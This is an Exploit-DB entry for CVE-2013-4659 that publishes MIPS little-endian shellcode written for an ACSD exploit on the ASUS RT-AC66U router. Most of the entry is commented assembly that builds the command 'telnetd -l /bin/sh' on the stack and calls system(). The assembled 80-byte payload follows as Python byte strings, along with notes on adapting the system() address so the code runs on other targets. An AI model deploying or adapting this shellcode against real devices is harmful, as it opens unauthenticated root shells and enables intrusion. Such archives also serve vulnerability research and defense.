ad

MIPS Little Endian Shellcode



EDB-ID: 27132 CVE: 2013-4659 OSVDB-ID: 95778
Author: Jacob Holcomb Published: 2013-07-27 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Disassembled MIPS Little Endian Shellcode 
# Shellcode was designed for ACSD exploit on the ASUS RT-AC66U SOHO router.
# CVE: CVE-2013-4659
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com
#
# NOTE:
# In order to use this MIPS ASM elsewhere, you will need to change the address
# of the system() function call to match your environment and reassemble the ASM.
# _ characters in the comments below represent a space.


    lui     t0,0x6e6c //Loading Upper Immediate nl into temp. reg. #0
    ori     t0,t0,0x6574 //Bitwise OR immediate. Putting et into lower 16 bits of t0
    sw      t0,-20(sp) //Store word pointer to command string for execution
    
    lui     t1,0x2064 //Loading Upper Immediate _d into temp. reg. #1
    ori     t1,t1,0x7465 //Bitwise OR immediate. Putting te into lower 16 bits of t0
    sw      t1,-16(sp) //Store next part of command

    lui     t2,0x2f20 //Loading Upper Immediate /_ into temp. reg. #2
    ori     t2,t2,0x6c2d //Bitwise OR immediate. Putting l- into lower 16 bits of t1
    sw      t2,-12(sp) //Store next part of command

    lui     t3,0x2f6e //Loading Upper Immedate /n into temp. reg. #3
    ori     t3,t3,0x6962 //Bitwise OR immediate. Putting ib into lower 16 bits of t2
    sw      t3,-8(sp) //Store next part of command

    li      t4,26739 //Loading Immediate hs00 into temp. reg. #4
    sw      t4,-4(sp) //Store next part of command

    addi    a0,sp,-20 //Store "telnetd -l /bin/sh" in reg. a0 for system() function call
    addi    sp,sp,-20 //Move stack pointer to "telnetd -l /bin/sh" string on the stack 

    lui     t9,0x2ab4 //Loading Upper Immediate of system() into t9
    ori     t9,t9,0xf050 //Bitwise OR immediate. Putting rest of system() into t9
    jalr    t9 //Jumpying to t9/system()

    andi    at,k1,0x4132 //Filler instruction for branch delay


# NOTE: Assembled shellcode
#
#    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
#    #Calling system() and executing telnetd -l /bin/sh
#    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
#    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
#    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
#    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
#    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
#    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
#    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
#    shellcode += "\x41\x61\x33"